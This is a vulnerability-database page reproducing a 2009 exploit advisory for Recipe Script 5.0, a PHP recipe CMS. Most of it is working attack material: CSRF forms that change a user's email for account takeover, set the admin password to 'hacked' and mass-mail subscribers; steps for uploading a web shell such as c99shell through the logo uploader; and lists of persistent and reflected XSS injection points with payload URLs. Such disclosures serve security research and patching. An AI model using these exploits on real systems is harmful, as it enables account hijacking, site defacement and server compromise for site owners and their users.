Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Recipe Script 5.0 XSS / XSRF / Shell Upload

🗓️ 16 Dec 2009 00:00:00Reported by Milos ZivanovicType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Recipe Script v5.0 (Shell Upload/XSRF/XSS) Multiple Vulnerabilities in PH

Code
`[#-----------------------------------------------------------------------------------------------#]  
[#] Title: Recipe Script v5.0 (Shell Upload/XSRF/XSS) Multiple Vulnerabilities  
[#] Author: Milos Zivanovic  
[#] Email: milosz.security[at]gmail.com  
[#] Date: 16. December 2009.  
[#-----------------------------------------------------------------------------------------------#]  
[#] Application: Recipe Script  
[#] Version: 5.0  
[#] Platform: PHP  
[#] Link: http://www.recipescript.com/index.php  
[#] Price: ~98 USD  
[#] Vulnerability: Multiple Vulnerabilities such as XSRF, Shell Upload, XSS  
[#-----------------------------------------------------------------------------------------------#]  
  
[#]Content  
|--User Panel  
| |--Change user email  
|  
|--Admin Panel  
|--Shell upload vulnerability  
|  
|--XSRF  
| |--Change admin password  
| |--Send email to subscribers  
|  
|--Persistent XSS  
| |--Edit footer  
| |--Add/Edit Category  
| |--Add/Edit Recipe  
| |--Add/Edit Menu  
| |--Add/Edit Block  
|  
|--XSS  
|--XSS in /admin/recipes.php  
|--XSS in /admin/categories.php  
|--XSS in /admin/all_comments.php  
|--XSS in /admin/users.php  
|--XSS in /admin/comments.php  
|--XSS in /admin/menus.php  
|--XSS in /admin/links.php  
|--XSS in /admin/banners.php  
  
  
[#]User Panel  
  
[*]Change user email (XSRF)  
  
We can use the following exploit to change users email and then go to  
'forget your password' form  
and it will send us password on the email.  
  
[EXPLOIT------------------------------------------------------------------------------------------]  
<form action="http://localhost/recipes/update_profile.php" method="POST">  
<input name="first_name" type="text" value="DEMO">  
<input name="last_name" type="text" value="USER">  
<input name="website" type="text" value="website.com">  
<input name="country" type="text" value="Moon State">  
<input name="email" type="text" value="[email protected]">  
<input type="checkbox" name="subscribed" value="1">  
<input type="submit" name="Submit" value="Update">  
</form>  
[EXPLOIT------------------------------------------------------------------------------------------]  
  
[#]Admin Panel  
  
[*]Shell upload vulnerability  
  
Visit link:  
http://localhost/recipes/admin/add_logo.php  
Upload your shell (ex. c99shell.php)  
Your shell should be here:  
http://localhost/recipes/admin/uploads/logo_.php  
If by any chanse is not there, open this page:  
http://localhost/recipes/admin/logo.php  
You'll see broken html object, right click > properties, and you will  
see the link to your shell  
  
[#]XSRF (Cross Site Request Forgery)  
  
[*]Change admin password  
  
[EXPLOIT------------------------------------------------------------------------------------------]  
<form action="http://localhost/recipes/admin/adminpass.php" method="POST">  
<input type="password" name="AdminPass" value="hacked">  
<input type="password" name="cAdminPass" value="hacked">  
<input type="submit" name="submit" value="Update Password">  
</form>  
[EXPLOIT------------------------------------------------------------------------------------------]  
  
[-]Send email to subscribers  
  
[EXPLOIT------------------------------------------------------------------------------------------]  
<form action="http://localhost/recipes/admin/send_email_users.php"  
method="POST">  
<input type="hidden" name="from_email" value="[email protected]">  
<input type="hidden" name="subject" value="Subject">  
<input type="hidden" name="message" value="Free your mind and the  
ass will follow!">  
<input type="hidden" name="emailtype" value="">  
<input type="submit" name="Submit" value="Send">  
</form>  
[EXPLOIT------------------------------------------------------------------------------------------]  
  
[#]Persistent XSS (Cross Site Scripting)  
  
[+]Edit footer (Persistent XSS)  
  
script: http://localhost/recipes/admin/edit_footertext.php  
is vulnerable to persistent xss attack, we can inject our malicious  
code in there and it will be  
on every page.  
  
[*]Add/Edit Category (Persistent XSS)  
  
Add: http://localhost/recipes/admin/add_category.php  
Edit: http://localhost/recipes/admin/categories.php  
Field that i tested is 'Category name'. We can inject our malicious  
code there and it will be seen  
on every page.  
  
[+]Add/Edit Recipe (Persistent XSS)  
  
Add: http://localhost/recipes/admin/add_recipe.php  
Edit: http://localhost/recipes/admin/recipes.php  
Vulnerable field is 'Recipe name'.  
  
[+]Add/Edit Menu (Persistent XSS)  
  
Add: http://localhost/recipes/admin/add_menu.php  
Edit: http://localhost/recipes/admin/menus.php  
Vulnerable field is 'Menu name'. This is seen in every page in the  
front end of the cms.  
  
[+]Add/Edit Block (Persistent XSS)  
  
Add: http://localhost/recipes/admin/add_block.php  
Edit: http://localhost/recipes/admin/blocks.php  
Vulnerable field is 'Block name'.  
  
[#]XSS (Cross Site Scripting)  
  
I used following javascript in testing: <script>alert(1)</script>  
  
[-]XSS in /admin/recipes.php  
  
[POC----------------------------------------------------------------------------------------------]  
http://localhost/recipes/admin/recipes.php?searchword="[XSS]  
http://localhost/recipes/admin/recipes.php?numitem="[XSS]  
[POC----------------------------------------------------------------------------------------------]  
  
[-]XSS in /admin/categories.php  
  
[POC----------------------------------------------------------------------------------------------]  
http://localhost/recipes/admin/categories.php?searchword="[XSS]  
http://localhost/recipes/admin/categories.php?numitem="[XSS]  
[POC----------------------------------------------------------------------------------------------]  
  
[-]XSS in /admin/all_comments.php  
  
[POC----------------------------------------------------------------------------------------------]  
http://localhost/recipes/admin/all_comments.php?searchword="[XSS]  
http://localhost/recipes/admin/all_comments.php?numitem="[XSS]  
[POC----------------------------------------------------------------------------------------------]  
  
[-]XSS in /admin/users.php  
  
[POC----------------------------------------------------------------------------------------------]  
http://localhost/recipes/admin/users.php?searchword="[XSS]  
http://localhost/recipes/admin/users.php?numitem="[XSS]  
[POC----------------------------------------------------------------------------------------------]  
  
[-]XSS in /admin/comments.php  
  
[POC----------------------------------------------------------------------------------------------]  
http://localhost/recipes/admin/comments.php?searchword="[XSS]  
http://localhost/recipes/admin/comments.php?numitem="[XSS]  
[POC----------------------------------------------------------------------------------------------]  
  
[-]XSS in /admin/menus.php  
  
[POC----------------------------------------------------------------------------------------------]  
http://localhost/recipes/admin/menus.php?numitem="[XSS]  
[POC----------------------------------------------------------------------------------------------]  
  
[-]XSS in /admin/links.php  
  
[POC----------------------------------------------------------------------------------------------]  
http://localhost/recipes/admin/links.php?searchword="[XSS]  
http://localhost/recipes/admin/links.php?numitem="[XSS]  
[POC----------------------------------------------------------------------------------------------]  
  
[-]XSS in /admin/banners.php  
  
[POC----------------------------------------------------------------------------------------------]  
http://localhost/recipes/admin/banners.php?searchword="[XSS]  
http://localhost/recipes/admin/banners.php?numitem="[XSS]  
[POC----------------------------------------------------------------------------------------------]  
  
[#]EOF  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Dec 2009 00:00Current
recipe scriptphpxsrfshell uploadxsscross site request forgerycross site scripting
25